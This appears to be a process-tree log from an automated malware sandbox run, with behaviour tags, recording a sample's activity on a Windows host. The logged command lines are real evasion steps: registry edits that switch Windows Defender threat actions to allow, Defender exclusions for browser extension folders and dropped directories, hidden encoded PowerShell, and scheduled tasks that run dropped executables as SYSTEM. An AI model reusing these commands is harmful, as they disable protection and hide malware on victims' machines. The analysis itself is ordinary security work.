C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gKJHPVqYj"5⤵PID:4296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bCAdHbOFiqtMCRhbmR" /SC once /ST 11:25:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\vBjgpUK.exe\" hl /yUsite_idMiU 385118 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2124
-
-
-
-
C:\Users\Admin\Pictures\73weWIzju6ojmzZLpcW37C8r.exe"C:\Users\Admin\Pictures\73weWIzju6ojmzZLpcW37C8r.exe"3⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2868
-
-
C:\Users\Admin\Pictures\9WJ4CGLG0XVmnP5KNQnINhJF.exe"C:\Users\Admin\Pictures\9WJ4CGLG0XVmnP5KNQnINhJF.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3088 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe4⤵
- Executes dropped EXE
PID:4512 -
C:\Windows\SYSTEM32\msiexec.exe"msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1312
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2320 -ip 23201⤵PID:3316
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1888 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3316 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:4596
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4712
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4440
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4584
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2972 -ip 29721⤵PID:5112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k smphost1⤵PID:3392
-
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\vBjgpUK.exeC:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\eIbkjtffPnzBjHv\vBjgpUK.exe hl /yUsite_idMiU 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4924 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:932
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:1232
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:4360
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:2532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:4948
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:4752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:4060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:2388
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:3256
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:1268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:2780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:4584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:1172
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:3120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:564
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2748
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:4984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:4760
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:1952
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:4120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:3488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:2732
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:2024
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:323⤵PID:2848
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:324⤵PID:1932
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:643⤵PID:4060
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:323⤵PID:1376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:643⤵PID:4856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:323⤵PID:3440
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:643⤵PID:1000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:323⤵PID:1268
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:643⤵PID:2780
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:323⤵PID:1192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:643⤵PID:3168
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:323⤵PID:4092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:643⤵PID:4132
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:572
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:2916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:4368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:323⤵PID:2448
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:643⤵PID:3836
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:323⤵PID:2352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:643⤵PID:2504
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gonHMwdrV" /SC once /ST 03:01:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
PID:3372
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gonHMwdrV"2⤵PID:4424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gonHMwdrV"2⤵PID:2580
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZJggANjsYpCqsGjEe" /SC once /ST 08:40:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\bfjxgfyuteUVCdh\yYUkcpR.exe\" UK /oVsite_idBLl 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2888 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2024
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ZJggANjsYpCqsGjEe"2⤵PID:5012
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2596 -
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 767ED4BC1BB7D24A22E54809F410B0462⤵
- Loads dropped DLL
PID:3168
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 7103C505192EA51A45997051DFC43D35 E Global\MSI00002⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2748
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 3F2DD9F9D2C40A2A39569047A1ABA662 M Global\MSI00002⤵PID:3588
-
-
